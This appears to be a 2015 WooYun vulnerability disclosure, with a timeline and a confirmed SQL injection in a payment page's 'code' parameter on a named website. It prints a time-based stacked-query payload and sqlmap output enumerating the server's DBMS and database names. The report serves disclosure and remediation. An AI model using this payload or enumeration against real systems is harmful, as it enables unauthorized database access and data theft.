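2015-11-09: Details reported to the vendor; awaiting vendor handling
2015-11-09: Vendor confirmed; details disclosed to the vendor only
2015-11-19: Details disclosed to core white hats and experts in related fields
2015-11-29: Details disclosed to regular white hats
2015-12-09: Details disclosed to trainee white hats
2015-12-24: Details disclosed to the public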
Someone has already submitted this before, but the others were fixed and this one was not. (WooYun: "SQL injection on a Mop site")
http://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay
Parameter: code (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: code=Alipay';WAITFOR DELAY '0:0:5'--
---
[10:37:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[10:37:33] [INFO] fetching database names
[10:37:33] [INFO] fetching number of databases
[10:37:33] [INFO] resumed: 8
[10:37:33] [INFO] resumed: bbs
[10:37:33] [INFO] resumed: master
[10:37:33] [INFO] resumed: model
[10:37:33] [INFO] resumed: msdb
[10:37:33] [INFO] resumed: ReportServer
[10:37:33] [INFO] resumed: Rem
[10:37:33] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[10:37:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[10:37:58] [INFO] adjusting time delay to 2 seconds due to good response times
tempdb
[10:38:55] [INFO] retrieved: xy003
available databases [8]:
[*] bbs
[*] master
[*] model
[*] msdb
[*] Rem
[*] ReportServer
[*] tempdb
[*] xy003
http://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-11-09 13:15
Thank you, much appreciated!
None yet